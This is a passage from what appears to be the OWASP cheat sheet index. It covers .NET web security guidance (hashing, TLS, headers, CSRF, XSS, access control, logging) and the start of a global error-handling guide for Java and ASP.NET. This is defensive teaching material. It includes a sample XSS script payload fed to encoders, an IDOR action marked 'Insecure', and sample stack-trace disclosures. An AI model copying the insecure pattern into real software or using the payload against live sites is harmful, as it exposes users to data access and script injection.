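As a minimal sketch only (algorithm choice and work factors should follow the Password Storage Cheat Sheet and the hashing section referenced above), deriving a PBKDF2 hash with a per-user random salt might look like this; the iteration count and sizes here are assumptions.

using System.Security.Cryptography;\n\n// Illustrative PBKDF2 sketch - the iteration count and sizes are assumptions,\n// refer to the Password Storage Cheat Sheet for current recommendations\nstring password = \"user supplied password\";\nbyte[] salt = new byte[16];\nRandomNumberGenerator.Fill(salt); // per-user random salt\nusing (var pbkdf2 = new Rfc2898DeriveBytes(password, salt, 600000, HashAlgorithmName.SHA256))\n{\nbyte[] hash = pbkdf2.GetBytes(32);\n// Store the salt, iteration count and hash together so the password can be verified later\n}\n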

DO: Enforce passwords with a minimum complexity that will survive a dictionary attack, i.e. longer passwords that use the full character set (numbers, symbols and letters) to increase entropy.

DO: Use a strong encryption routine such as AES-256 where personally identifiable data needs to be restored to its original format. Protect encryption keys more than any other asset; please find more information on storing encryption keys at rest. Apply the following test: would you be happy leaving the data on a spreadsheet on a bus for everyone to read? Assume the attacker can get direct access to your database and protect it accordingly. More information can be found here.

DO: Use TLS 1.2 for your entire site. Get a free certificate from LetsEncrypt.org.

DO NOT: Allow SSL; it is now obsolete.

DO: Have a strong TLS policy (see SSL Best Practices), using TLS 1.2 wherever possible. Then check the configuration using SSL Test or TestSSL.

DO: Ensure headers are not disclosing information about your application. See HttpHeaders.cs, Dionach StripHeaders, or disable them via web.config or startup.cs:

More information on Transport Layer Protection can be found here. e.g. Web.config:

<system.web>\n<httpRuntime enableVersionHeader=\"false\"/>\n</system.web>\n<system.webServer>\n<security>\n<requestFiltering removeServerHeader=\"true\" />\n</security>\n<httpProtocol>\n<customHeaders>\n<add name=\"X-Content-Type-Options\" value=\"nosniff\" />\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n<add name=\"X-Permitted-Cross-Domain-Policies\" value=\"master-only\"/>\n<add name=\"X-XSS-Protection\" value=\"0\"/>\n<remove name=\"X-Powered-By\"/>\n</customHeaders>\n</httpProtocol>\n</system.webServer>\n

e.g. Startup.cs:

app.UseHsts(hsts => hsts.MaxAge(365).IncludeSubdomains());\napp.UseXContentTypeOptions();\napp.UseReferrerPolicy(opts => opts.NoReferrer());\napp.UseXXssProtection(options => options.FilterDisabled());\napp.UseXfo(options => options.Deny());\n\napp.UseCsp(opts => opts\n.BlockAllMixedContent()\n.StyleSources(s => s.Self())\n.StyleSources(s => s.UnsafeInline())\n.FontSources(s => s.Self())\n.FormActions(s => s.Self())\n.FrameAncestors(s => s.Self())\n.ImageSources(s => s.Self())\n.ScriptSources(s => s.Self())\n);\n

More information about headers can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a4-xml-external-entities-xxe","title":"A4 XML External Entities (XXE)","text":"

XXE attacks occur when an XML parser does not properly process user input that contains an external entity declaration in the doctype of an XML payload.

This article discusses the most common XML Processing Options for .NET.

Please refer to the XXE cheat sheet for more detailed information on preventing XXE and other XML Denial of Service attacks.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a5-broken-access-control","title":"A5 Broken Access Control","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#weak-account-management","title":"Weak Account management","text":"

Ensure cookies are sent via httpOnly:

CookieHttpOnly\u00a0=\u00a0true,\n

Reduce the time period a session can be stolen in by reducing session timeout and removing sliding expiration:

ExpireTimeSpan\u00a0=\u00a0TimeSpan.FromMinutes(60),\nSlidingExpiration\u00a0=\u00a0false\n

See here for the full startup code snippet.

Ensure cookies are sent over HTTPS in the production environment. This should be enforced in the config transforms:

<httpCookies requireSSL=\"true\" xdt:Transform=\"SetAttributes(requireSSL)\"/>\n<authentication>\n<forms requireSSL=\"true\" xdt:Transform=\"SetAttributes(requireSSL)\"/>\n</authentication>\n

Protect LogOn, Registration and password reset methods against brute force attacks by throttling requests (see code below). Consider also using ReCaptcha.

[HttpPost]\n[AllowAnonymous]\n[ValidateAntiForgeryToken]\n[AllowXRequestsEveryXSecondsAttribute(Name = \"LogOn\",\nMessage = \"You have performed this action more than {x} times in the last {n} seconds.\",\nRequests = 3, Seconds = 60)]\npublic\u00a0async\u00a0Task<ActionResult>\u00a0LogOn(LogOnViewModel\u00a0model,\u00a0string\u00a0returnUrl)\n

DO NOT: Roll your own authentication or session management; use the ones provided by .NET.

DO NOT: Tell someone if the account exists on LogOn, Registration or Password reset. Say something like 'Either the username or password was incorrect', or 'If this account exists then a reset token will be sent to the registered email address'. This protects against account enumeration.

The feedback to the user should be identical whether or not the account exists, both in terms of content and behavior: e.g. if the response takes 50% longer when the account is real, then membership information can be guessed and tested.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#missing-function-level-access-control","title":"Missing function-level access control","text":"

DO: Authorize users on all externally facing endpoints. The .NET framework has many ways to authorize a user, use them at method level:

[Authorize(Roles\u00a0=\u00a0\"Admin\")]\n[HttpGet]\npublic\u00a0ActionResult\u00a0Index(int\u00a0page\u00a0=\u00a01)\n

or better yet, at controller level:

[Authorize]\npublic\u00a0class\u00a0UserController\n

You can also check roles in code using the identity features in .NET: System.Web.Security.Roles.IsUserInRole(userName, roleName), as sketched below.
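
A minimal sketch of such an in-code check inside an MVC controller action might look like the following; the role name and the response type are illustrative.

// Illustrative in-code role check inside an MVC action (role name is an example)\nif (!System.Web.Security.Roles.IsUserInRole(User.Identity.Name, \"Admin\"))\n{\nreturn new HttpUnauthorizedResult();\n}\n// ...continue with the privileged operation\n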

You can find more information here on Access Control and here for Authorization.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#insecure-direct-object-references","title":"Insecure Direct object references","text":"

When you have a resource (object) which can be accessed by a reference (in the sample below this is the id), then you need to ensure that the user is authorized to access that resource.

// Insecure\npublic ActionResult Edit(int id)\n{\nvar user = _context.Users.FirstOrDefault(e => e.Id == id);\nreturn View(\"Details\", new UserViewModel(user));\n}\n\n// Secure\npublic ActionResult Edit(int id)\n{\nvar user = _context.Users.FirstOrDefault(e => e.Id == id);\n// Establish that the user has the right to edit the details\nif (user.Id != _userIdentity.GetUserId())\n{\nHandleErrorInfo error = new HandleErrorInfo(\nnew Exception(\"INFO: You do not have permission to edit these details\"));\nreturn View(\"Error\", error);\n}\nreturn View(\"Edit\", new UserViewModel(user));\n}\n

More information can be found here for Insecure Direct Object Reference.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a6-security-misconfiguration","title":"A6 Security Misconfiguration","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#debug-and-stack-trace","title":"Debug and Stack Trace","text":"

Ensure debug and trace are off in production. This can be enforced using web.config transforms:

<compilation xdt:Transform=\"RemoveAttributes(debug)\" />\n<trace enabled=\"false\" xdt:Transform=\"Replace\"/>\n

DO NOT: Use default passwords.

DO: (When using TLS) Redirect a request made over HTTP to HTTPS:

e.g. Global.asax.cs:

protected\u00a0void\u00a0Application_BeginRequest()\n{\n#if\u00a0!DEBUG\n//\u00a0SECURE:\u00a0Ensure\u00a0any\u00a0request\u00a0is\u00a0returned\u00a0over\u00a0SSL/TLS\u00a0in\u00a0production\nif\u00a0(!Request.IsLocal\u00a0&&\u00a0!Context.Request.IsSecureConnection)\u00a0{\nvar\u00a0redirect\u00a0=\u00a0Context.Request.Url.ToString()\n.ToLower(CultureInfo.CurrentCulture)\n.Replace(\"http:\",\u00a0\"https:\");\nResponse.Redirect(redirect);\n}\n#endif\n}\n

e.g. Startup.cs, in the Configure() method:

  app.UseHttpsRedirection();\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery","title":"Cross-site request forgery","text":"

DO NOT: Send sensitive data without validating Anti-Forgery-Tokens (.NET / .NET Core).

DO: Send the anti-forgery token with every POST/PUT request:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-framework","title":"Using .NET Framework","text":"
using (Html.BeginForm(\"LogOff\", \"Account\", FormMethod.Post, new { id = \"logoutForm\",\n@class = \"pull-right\" }))\n{\n@Html.AntiForgeryToken()\n<ul class=\"nav nav-pills\">\n<li role=\"presentation\">\nLogged on as @User.Identity.Name\n</li>\n<li role=\"presentation\">\n<a href=\"javascript:document.getElementById('logoutForm').submit()\">Log off</a>\n</li>\n</ul>\n}\n

Then validate it at the method or preferably the controller level:

[HttpPost]\n[ValidateAntiForgeryToken]\npublic\u00a0ActionResult\u00a0LogOff()\n

Make sure the tokens are removed completely for invalidation on logout.

///\u00a0<summary>\n///\u00a0SECURE:\u00a0Remove\u00a0any\u00a0remaining\u00a0cookies\u00a0including\u00a0Anti-CSRF\u00a0cookie\n///\u00a0</summary>\npublic\u00a0void\u00a0RemoveAntiForgeryCookie(Controller\u00a0controller)\n{\nstring[]\u00a0allCookies\u00a0=\u00a0controller.Request.Cookies.AllKeys;\nforeach\u00a0(string\u00a0cookie\u00a0in\u00a0allCookies)\n{\nif\u00a0(controller.Response.Cookies[cookie]\u00a0!=\u00a0null\u00a0&&\ncookie\u00a0==\u00a0\"__RequestVerificationToken\")\n{\ncontroller.Response.Cookies[cookie].Expires\u00a0=\u00a0DateTime.Now.AddDays(-1);\n}\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-core-20-or-later","title":"Using .NET Core 2.0 or later","text":"

Starting with .NET Core 2.0 it is possible to automatically generate and verify the antiforgery token.

If you are using tag-helpers, which is the default for most web project templates, then all forms will automatically send the anti-forgery token. You can check if tag-helpers are enabled by checking if your main _ViewImports.cshtml file contains:

@addTagHelper *, Microsoft.AspNetCore.Mvc.TagHelpers\n

IHtmlHelper.BeginForm also sends anti-forgery-tokens automatically.

Unless you are using tag-helpers or IHtmlHelper.BeginForm, you must use the requisite helper on forms as seen here:

<form action=\"RelevantAction\" >\n@Html.AntiForgeryToken()\n</form>\n

To automatically validate all requests other than GET, HEAD, OPTIONS and TRACE you need to add a global action filter with the AutoValidateAntiforgeryToken attribute inside your Startup.cs as mentioned in the following article:

services.AddMvc(options =>\n{\noptions.Filters.Add(new AutoValidateAntiforgeryTokenAttribute());\n});\n

If you need to disable the attribute validation for a specific method on a controller you can add the IgnoreAntiforgeryToken attribute to the controller method (for MVC controllers) or parent class (for Razor pages):

[IgnoreAntiforgeryToken]\n[HttpDelete]\npublic IActionResult Delete()\n
[IgnoreAntiforgeryToken]\npublic class UnsafeModel : PageModel\n

If you also need to validate the token on GET, HEAD, OPTIONS or TRACE requests, you can add the ValidateAntiforgeryToken attribute to the controller method (for MVC controllers) or parent class (for Razor pages):

[HttpGet]\n[ValidateAntiforgeryToken]\npublic IActionResult DoSomethingDangerous()\n
[HttpGet]\n[ValidateAntiforgeryToken]\npublic class SafeModel : PageModel\n

In case you can't use a global action filter, add the AutoValidateAntiforgeryToken attribute to your controller classes or Razor page models:

[AutoValidateAntiforgeryToken]\npublic class UserController\n
[AutoValidateAntiforgeryToken]\npublic class SafeModel : PageModel\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-core-20-or-net-framework-with-ajax","title":"Using .Net Core 2.0 or .NET Framework with AJAX","text":"

You will need to attach the anti-forgery token to AJAX requests.

If you are using jQuery in an ASP.NET Core MVC view, this can be achieved using this snippet:

@inject  Microsoft.AspNetCore.Antiforgery.IAntiforgery antiforgeryProvider\n$.ajax(\n{\ntype: \"POST\",\nurl: '@Url.Action(\"Action\", \"Controller\")',\ncontentType: \"application/x-www-form-urlencoded; charset=utf-8\",\ndata: {\nid: id,\n'__RequestVerificationToken': '@antiforgeryProvider.GetAndStoreTokens(this.Context).RequestToken'\n}\n})\n

If you are using the .NET Framework, you can find some code snippets here.

More information can be found here for Cross-Site Request Forgery.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a7-cross-site-scripting-xss","title":"A7 Cross-Site Scripting (XSS)","text":"

DO NOT: Trust any data the user sends you; prefer allow lists (always safe) over block lists.

You get encoding of all HTML content with MVC3. To properly encode all content, whether HTML, JavaScript, CSS, LDAP etc., use the Microsoft AntiXSS library:

Install-Package\u00a0AntiXSS

Then set in config:

<system.web>\n<httpRuntime targetFramework=\"4.5\"\nenableVersionHeader=\"false\"\nencoderType=\"Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary\"\nmaxRequestLength=\"4096\" />\n
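
For output contexts that are not HTML-encoded automatically, the AntiXSS encoders can also be called directly; a hedged sketch with an illustrative input value follows.

using Microsoft.Security.Application;\n\n// Illustrative use of the AntiXSS encoders for different output contexts\nstring untrustedInput = \"<script>alert('xss')</script>\";\nstring safeHtml = Encoder.HtmlEncode(untrustedInput);\nstring safeAttribute = Encoder.HtmlAttributeEncode(untrustedInput);\nstring safeJavaScript = Encoder.JavaScriptEncode(untrustedInput);\n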

DO NOT: Use the [AllowHtml] attribute or the @Html.Raw helper unless you really know that the content you are writing to the browser is safe and has been escaped properly.

DO: Enable a Content Security Policy (CSP); this will prevent your pages from accessing assets they should not be able to access (e.g. a malicious script):

<system.webServer>\n<httpProtocol>\n<customHeaders>\n<add name=\"Content-Security-Policy\"\nvalue=\"default-src 'none'; style-src 'self'; img-src 'self';\n                font-src 'self'; script-src 'self'\" />\n

More information can be found here for Cross-Site Scripting.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a8-insecure-deserialization","title":"A8 Insecure Deserialization","text":"

Information about Insecure Deserialization can be found on this cheat sheet.

DO NOT: Accept serialized objects from untrusted sources.
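
As one hedged illustration of this principle when using Newtonsoft.Json, avoid enabling polymorphic type handling for untrusted input; the type and variable names below are placeholders.

using Newtonsoft.Json;\n\npublic static MyDto DeserializeUntrusted(string untrustedJson)\n{\n// Illustrative precaution: never enable TypeNameHandling when deserializing untrusted JSON\n// (None is already the default, it is made explicit here; MyDto is a placeholder type)\nvar settings = new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.None };\nreturn JsonConvert.DeserializeObject<MyDto>(untrustedJson, settings);\n}\n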

DO: Validate user input. Malicious users are able to use objects like cookies to insert malicious information to change user roles. In some cases, hackers are able to elevate their privileges to administrator rights by using a pre-existing or cached password hash from a previous session.

DO: Prevent deserialization of domain objects.

DO: Run the deserialization code with limited access permissions. If a deserialized hostile object tries to initiate a system process or access a resource within the server or the host's OS, it will be denied access and a permission flag will be raised so that a system administrator is made aware of any anomalous activity on the server.

More information can be found here: Deserialization Cheat Sheet

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a9-using-components-with-known-vulnerabilities","title":"A9 Using Components with Known Vulnerabilities","text":"

DO: Keep the .NET Framework updated with the latest patches.

DO: Keep your NuGet packages up to date, many will contain their own vulnerabilities.

DO: Run the OWASP Dependency Checker against your application as part of your build process and act on any high-severity vulnerabilities.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a10-insufficient-logging-monitoring","title":"A10 Insufficient Logging & Monitoring","text":"

DO: Ensure all login failures, access control failures and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts.

DO: Establish effective monitoring and alerting so suspicious activities are detected and responded to in a timely fashion.

DO NOT: Log only generic error messages, such as Log.Error(\"Error was thrown\"); rather, log the stack trace, error message and the ID of the user who caused the error.

DO NOT: Log sensitive data such as users' passwords.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

What Logs to Collect and more information about Logging can be found on this cheat sheet.

.NET Core comes with a LoggerFactory, which is in Microsoft.Extensions.Logging. More information about ILogger can be found here.

The following shows how to log all errors from Startup.cs, so that any time an error is thrown it will be logged:

public void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\nif (env.IsDevelopment())\n{\n_isDevelopment = true;\napp.UseDeveloperExceptionPage();\n}\n\n//Log all errors in the application\napp.UseExceptionHandler(errorApp =>\n{\nerrorApp.Run(async context =>\n{\nvar errorFeature = context.Features.Get<IExceptionHandlerFeature>();\nvar exception = errorFeature.Error;\n\nLog.Error(String.Format(\"Stacktrace of error: {0}\",exception.StackTrace.ToString()));\n});\n});\n\napp.UseAuthentication();\napp.UseMvc();\n}\n}\n

e.g. injecting the logger into the class constructor, which makes writing unit tests simpler. This is recommended if instances of the class will be created using dependency injection (e.g. MVC controllers). The example below shows logging of all unsuccessful login attempts.

public class AccountsController : Controller\n{\nprivate ILogger _Logger;\n\npublic AccountsController( ILogger logger)\n{\n_Logger = logger;\n}\n\n[HttpPost]\n[AllowAnonymous]\n[ValidateAntiForgeryToken]\npublic async Task<IActionResult> Login(LoginViewModel model)\n{\nif (ModelState.IsValid)\n{\nvar result = await _signInManager.PasswordSignInAsync(model.Email, model.Password, model.RememberMe, lockoutOnFailure: false);\nif (result.Succeeded)\n{\n//Log all successful log in attempts\nLog.Information(String.Format(\"User: {0}, Successfully Logged in\", model.Email));\n//Code for successful login\n}\nelse\n{\n//Log all incorrect log in attempts\nLog.Information(String.Format(\"User: {0}, Incorrect Password\", model.Email));\n}\n}\n...\n}\n

Logging levels for ILogger, in order of high to low importance, are: Critical, Error, Warning, Information, Debug and Trace.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#monitoring","title":"Monitoring","text":"

Monitoring allows us to validate the performance and health of a running system through key performance indicators.

In .NET a great option to add monitoring capabilities is Application Insights.

More information about Logging and Monitoring can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#owasp-2013","title":"OWASP 2013","text":"

Below is a vulnerability that is not discussed in the OWASP Top 10 2017.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a10-unvalidated-redirects-and-forwards","title":"A10 Unvalidated redirects and forwards","text":"

A protection against this was introduced in the MVC 3 template. Here is the code:

public\u00a0async\u00a0Task<ActionResult>\u00a0LogOn(LogOnViewModel\u00a0model,\u00a0string\u00a0returnUrl)\n{\nif\u00a0(ModelState.IsValid)\n{\nvar\u00a0logonResult\u00a0=\u00a0await\u00a0_userManager.TryLogOnAsync(model.UserName,\u00a0model.Password);\nif\u00a0(logonResult.Success)\n{\nawait\u00a0_userManager.LogOnAsync(logonResult.UserName,\u00a0model.RememberMe);\u00a0\u00a0return\u00a0RedirectToLocal(returnUrl);\n...\n
private\u00a0ActionResult\u00a0RedirectToLocal(string\u00a0returnUrl)\n{\nif\u00a0(Url.IsLocalUrl(returnUrl))\n{\nreturn\u00a0Redirect(returnUrl);\n}\nelse\n{\nreturn\u00a0RedirectToAction(\"Landing\",\u00a0\"Account\");\n}\n}\n

Other advice:

More information:

For more information on all of the above, and for code samples incorporated into a sample MVC5 application with an enhanced security baseline, go to the Security Essentials Baseline project.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#xaml-guidance","title":"XAML Guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#windows-forms-guidance","title":"Windows Forms Guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#wcf-guidance","title":"WCF Guidance","text":""},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html","title":"Error Handling Cheat Sheet","text":""},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Error handling is a part of the overall security of an application. Except in movies, an attack always begins with a Reconnaissance phase in which the attacker will try to gather as much technical information (often name and version properties) as possible about the target, such as the application server, frameworks, libraries, etc.

Unhandled errors can assist an attacker in this initial phase, which is very important for the rest of the attack.

The following link provides a description of the different phases of an attack.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#context","title":"Context","text":"

Issues at the error handling level can reveal a lot of information about the target and can also be used to identify injection points in the target's features.

Below is an example of the disclosure of a technology stack, here the Struts2 and Tomcat versions, via an exception rendered to the user:

HTTP Status 500 - For input string: \"null\"\n\ntype Exception report\n\nmessage For input string: \"null\"\n\ndescription The server encountered an internal error that prevented it from fulfilling this request.\n\nexception\n\njava.lang.NumberFormatException: For input string: \"null\"\n    java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)\n    java.lang.Integer.parseInt(Integer.java:492)\n    java.lang.Integer.parseInt(Integer.java:527)\n    sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\n    sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)\n    sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\n    java.lang.reflect.Method.invoke(Method.java:606)\n    com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:450)\n    com.opensymphony.xwork2.DefaultActionInvocation.invokeActionOnly(DefaultActionInvocation.java:289)\n    com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:252)\n    org.apache.struts2.interceptor.debugging.DebuggingInterceptor.intercept(DebuggingInterceptor.java:256)\n    com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:246)\n    ...\n\nnote: The full stack trace of the root cause is available in the Apache Tomcat/7.0.56 logs.\n

Below is an example of disclosure of a SQL query error, along with the site installation path, that can be used to identify an injection point:

Warning: odbc_fetch_array() expects parameter /1 to be resource, boolean given\nin D:\\app\\index_new.php on line 188\n

The OWASP Testing Guide provides different techniques to obtain technical information from an application.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#objective","title":"Objective","text":"

The article shows how to configure a global error handler as part of your application's runtime configuration. In some cases, it may be more efficient to define this error handler as part of your code. The outcome is that when an unexpected error occurs, a generic response is returned by the application but the error details are logged server-side for investigation, and are not returned to the user.

The following schema shows the target approach:

As most recent application topologies are API based, we assume in this article that the backend exposes only a REST API and does not contain any user interface content. The application should try and exhaustively cover all possible failure modes and use 5xx errors only to indicate responses to requests that it cannot fulfill, but not provide any content as part of the response that would reveal implementation details. For that, RFC 7807 - Problem Details for HTTP APIs defines a document format. For the error logging operation itself, the logging cheat sheet should be used. This article focuses on the error handling part.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#proposition","title":"Proposition","text":"

For each technology stack, the following configuration options are proposed:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#standard-java-web-application","title":"Standard Java Web Application","text":"

For this kind of application, a global error handler can be configured at the web.xml deployment descriptor level.

We propose here a configuration that can be used from Servlet specification version 2.5 and above.

With this configuration, any unexpected error will cause a redirection to the page error.jsp in which the error will be traced and a generic response will be returned.

Configuration of the redirection into the web.xml file:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<web-app xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" ns=\"http://java.sun.com/xml/ns/javaee\"\nxsi:schemaLocation=\"http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd\"\nversion=\"3.0\">\n...\n    <error-page>\n<exception-type>java.lang.Exception</exception-type>\n<location>/error.jsp</location>\n</error-page>\n...\n</web-app>\n

Content of the error.jsp file:

<%@ page language=\"java\" isErrorPage=\"true\" contentType=\"application/json; charset=UTF-8\"\npageEncoding=\"UTF-8\"%>\n<%\nString errorMessage = exception.getMessage();\n//Log the exception via the content of the implicit variable named \"exception\"\n//...\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response is an error\nresponse.setHeader(\"X-ERROR\", \"true\");\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, when we have misbehaving clients\nresponse.setStatus(500);\n%>\n{\"message\":\"An error occur, please retry\"}\n
"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#java-springmvcspringboot-web-application","title":"Java SpringMVC/SpringBoot web application","text":"

With SpringMVC or SpringBoot, you can define a global error handler by implementing the following class in your project. Spring Framework 6 introduced the problem details based on RFC 7807.

We indicate to the handler, via the annotation @ExceptionHandler, to act when any exception extending the class java.lang.Exception is thrown by the application. We also use the ProblemDetail class to create the response object.

import org.springframework.http.HttpStatus;\nimport org.springframework.http.ProblemDetail;\nimport org.springframework.web.bind.annotation.ExceptionHandler;\nimport org.springframework.web.bind.annotation.RestControllerAdvice;\nimport org.springframework.web.context.request.WebRequest;\nimport org.springframework.web.servlet.mvc.method.annotation.ResponseEntityExceptionHandler;\n\n/**\n * Global error handler in charge of returning a generic response in case of unexpected error situation.\n */\n@RestControllerAdvice\npublic class RestResponseEntityExceptionHandler extends ResponseEntityExceptionHandler {\n\n@ExceptionHandler(value = {Exception.class})\npublic ProblemDetail handleGlobalError(RuntimeException exception, WebRequest request) {\n//Log the exception via the content of the parameter named \"exception\"\n//...\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients\n//By specification, the content-type can be \"application/problem+json\" or \"application/problem+xml\"\nreturn ProblemDetail.forStatusAndDetail(HttpStatus.INTERNAL_SERVER_ERROR, \"An error occur, please retry\");\n}\n}\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#asp-net-core-web-application","title":"ASP NET Core web application","text":"

With ASP.NET Core, you can define a global error handler by indicating that the exception handler is a dedicated API Controller.

Content of the API Controller dedicated to the error handling:

using Microsoft.AspNetCore.Authorization;\nusing Microsoft.AspNetCore.Diagnostics;\nusing Microsoft.AspNetCore.Mvc;\nusing System;\nusing System.Collections.Generic;\nusing System.Net;\n\nnamespace MyProject.Controllers\n{\n/// <summary>\n/// API Controller used to intercept and handle all unexpected exception\n/// </summary>\n[Route(\"api/[controller]\")]\n[ApiController]\n[AllowAnonymous]\npublic class ErrorController : ControllerBase\n{\n/// <summary>\n/// Action that will be invoked for any call to this Controller in order to handle the current error\n/// </summary>\n/// <returns>A generic error formatted as JSON because we are in a REST API app context</returns>\n[HttpGet]\n[HttpPost]\n[HttpHead]\n[HttpDelete]\n[HttpPut]\n[HttpOptions]\n[HttpPatch]\npublic JsonResult Handle()\n{\n//Get the exception that has implied the call to this controller\nException exception = HttpContext.Features.Get<IExceptionHandlerFeature>()?.Error;\n//Log the exception via the content of the variable named \"exception\" if it is not NULL\n//...\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response\n//is an error\nvar responseBody = new Dictionary<String, String>{ {\n\"message\", \"An error occur, please retry\"\n} };\nJsonResult response = new JsonResult(responseBody);\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients\nresponse.StatusCode = (int)HttpStatusCode.InternalServerError;\nRequest.HttpContext.Response.Headers.Remove(\"X-ERROR\");\nRequest.HttpContext.Response.Headers.Add(\"X-ERROR\", \"true\");\nreturn response;\n}\n}\n}\n

Definition in the application Startup.cs file of the mapping of the exception handler to the dedicated error handling API controller:

using Microsoft.AspNetCore.Builder;\nusing Microsoft.AspNetCore.Hosting;\nusing Microsoft.AspNetCore.Mvc;\nusing Microsoft.Extensions.Configuration;\nusing Microsoft.Extensions.DependencyInjection;\n\nnamespace MyProject\n{\npublic class Startup\n{\n...\npublic void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\n//First we configure the error handler middleware!\n//We enable the global error handler in others environments than DEV\n//because debug page are useful during implementation\nif (env.IsDevelopment())\n{\napp.UseDeveloperExceptionPage();\n}\nelse\n{\n//Our global handler is defined on \"/api/error\" URL so we indicate to the\n//exception handler to call this API controller\n//on any unexpected exception raised by the application\napp.UseExceptionHandler(\"/api/error\");\n\n//To customize the response content type and text, use the overload of\n//UseStatusCodePages that takes a content type and format string.\napp.UseStatusCodePages(\"text/plain\", \"Status code page, status code: {0}\");\n}\n\n//We configure others middlewares, remember that the declaration order is important...\napp.UseMvc();\n//...\n}\n}\n}\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#asp-net-web-api-web-application","title":"ASP NET Web API web application","text":"

With ASP.NET Web API (from the standard .NET framework and not from the .NET Core framework), you can define and register handlers in order to trace and handle any error that occurs in the application.

Definition of the handler for the tracing of the error details:

using System;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject.Security\n{\n/// <summary>\n/// Global logger used to trace any error that occurs at application wide level\n/// </summary>\npublic class GlobalErrorLogger : ExceptionLogger\n{\n/// <summary>\n/// Method in charge of the management of the error from a tracing point of view\n/// </summary>\n/// <param name=\"context\">Context containing the error details</param>\npublic override void Log(ExceptionLoggerContext context)\n{\n//Get the exception\nException exception = context.Exception;\n//Log the exception via the content of the variable named \"exception\" if it is not NULL\n//...\n}\n}\n}\n

Definition of the handler for the management of the error in order to return a generic response:

using Newtonsoft.Json;\nusing System;\nusing System.Collections.Generic;\nusing System.Net;\nusing System.Net.Http;\nusing System.Text;\nusing System.Threading;\nusing System.Threading.Tasks;\nusing System.Web.Http;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject.Security\n{\n/// <summary>\n/// Global handler used to handle any error that occurs at application wide level\n/// </summary>\npublic class GlobalErrorHandler : ExceptionHandler\n{\n/// <summary>\n/// Method in charge of handle the generic response send in case of error\n/// </summary>\n/// <param name=\"context\">Error context</param>\npublic override void Handle(ExceptionHandlerContext context)\n{\ncontext.Result = new GenericResult();\n}\n\n/// <summary>\n/// Class used to represent the generic response send\n/// </summary>\nprivate class GenericResult : IHttpActionResult\n{\n/// <summary>\n/// Method in charge of creating the generic response\n/// </summary>\n/// <param name=\"cancellationToken\">Object to cancel the task</param>\n/// <returns>A task in charge of sending the generic response</returns>\npublic Task<HttpResponseMessage> ExecuteAsync(CancellationToken cancellationToken)\n{\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response\n//is an error\nvar responseBody = new Dictionary<String, String>{ {\n\"message\", \"An error occur, please retry\"\n} };\n// Note that we're using an internal server error response\n// In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients \nHttpResponseMessage response = new HttpResponseMessage(HttpStatusCode.InternalServerError);\nresponse.Headers.Add(\"X-ERROR\", \"true\");\nresponse.Content = new StringContent(JsonConvert.SerializeObject(responseBody),\nEncoding.UTF8, \"application/json\");\nreturn 